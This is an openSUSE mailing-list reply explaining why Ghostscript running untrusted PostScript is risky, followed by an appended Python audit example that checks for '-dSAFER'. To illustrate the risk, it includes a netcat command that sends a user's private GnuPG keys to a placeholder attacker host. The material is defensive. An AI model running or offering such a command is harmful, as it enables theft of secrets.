Mailinglist Archive: opensuse-factory (443 mails)

Re: [opensuse-factory] How to inform users of security settings (boo#713289)
On 04-07-19 at 16:07, Johannes Meixner wrote:
YI:

For some background information about the root cause behind
all those PostScript/Ghostscript related security issues
see the section
"It is crucial to limit access to CUPS to trusted users" in
https://en.opensuse.org/SDB:CUPS_and_SANE_Firewall_settings
that reads (excerpts):
-------------------------------------------------------------------
PostScript but also PDF to some extent ... is actually a program.
...
PostScript is a general purpose Turing-complete programming
language (cf. https://en.wikipedia.org/wiki/PostScript)
that supports in particular file access on the system disk.
When Ghostscript processes PostScript it runs a PostScript
program as the user who runs Ghostscript ...
When Ghostscript processes an arbitrary PostScript file,
the user who runs Ghostscript runs an arbitrary program
which can do anything on the system where Ghostscript runs
that this user is allowed to do on that system.
To make it safer when Ghostscript runs a PostScript program
the Ghostscript command line option '-dSAFER' disables
certain file access functionality (for details
see /usr/share/doc/ghostscript/*/Use.htm).
...
Its name 'SAFER' says everything: It makes it 'safer'
to let Ghostscript run a PostScript program, but
it does not make it completely safe.
-------------------------------------------------------------------


Simply put:

Via some special (but well known) indirections in Ghostscript
a PostScript program or an Encapsulated PostScript [EPS] program
that a user runs via Ghostscript could execute certain stuff
which results basically in the equivalent of things like

netcat server.attacker.net 12345 </home/user/.gnupg/private-keys

when an innocent user only liked to view the graphical output
of a malicious PostScript program or convert it into another
(graphical) data type.

Cf.
http://bugzilla.opensuse.org/show_bug.cgi?id=1134327#c13


In the end it means:

By default it must not be allowed to let Ghostscript
(or any other PostScript interpreter) run arbitrary
PostScript programs from (possibly) untrusted origin.

Thanks for the information.

Thanks all for input. My proposal was not met with enthusiasm, so that is a no-go.

I have added a README.SUSE with all information and options the user has. In the description field I refer to this. It is in Publishing/lyx, for those who would like to give feedback. I will submit it later to factory.

Kind Regards,

Cor
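
As an added illustration of the '-dSAFER' point quoted in the mail above (not part of the original mail and not code from any openSUSE package), this Python example audits shell command lines for Ghostscript calls that omit '-dSAFER' or pass '-dNOSAFER'. The function names, the list of binary names and the sample command lines are assumptions constructed for the example.

```python
import os
import shlex

GS_NAMES = {"gs", "ghostscript"}   # binary names checked (assumption)
SEPARATORS = set("|;&()")          # tokens that end one simple command

def gs_invocations(line):
    """Yield the argument list of each Ghostscript call in a shell line."""
    lex = shlex.shlex(line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True    # keep -sOutputFile=a%d.png as one token
    cmd = []
    for tok in list(lex) + [";"]:  # trailing ';' flushes the last command
        if tok and set(tok) <= SEPARATORS:
            # Only the first word of a simple command is treated as the binary.
            if cmd and os.path.basename(cmd[0]) in GS_NAMES:
                yield cmd[1:]
            cmd = []
        else:
            cmd.append(tok)

def audit(line):
    """Return findings for one command line; an empty list means none."""
    try:
        calls = list(gs_invocations(line))
    except ValueError as exc:      # e.g. unbalanced quotes
        return ["unparseable command line: %s" % exc]
    findings = []
    for args in calls:
        if "-dNOSAFER" in args:
            findings.append("gs called with -dNOSAFER")
        elif "-dSAFER" not in args:
            findings.append("gs called without -dSAFER")
    return findings

# Constructed sample command lines, not taken from any real package.
SAMPLES = [
    "gs -dSAFER -dBATCH -dNOPAUSE -sDEVICE=pdfwrite -sOutputFile=out.pdf in.eps",
    "gs -dBATCH -dNOPAUSE -sDEVICE=png16m -sOutputFile=page%d.png in.ps",
    "zcat doc.ps.gz | /usr/bin/gs -dNOSAFER -q -sDEVICE=pdfwrite -o out.pdf -",
    "convert in.png out.jpg",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(audit(line) or ["ok"], line)
```

An empty result only shows that the option is present on the command line; as the quoted SDB text says, '-dSAFER' makes running a PostScript program safer, not completely safe.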

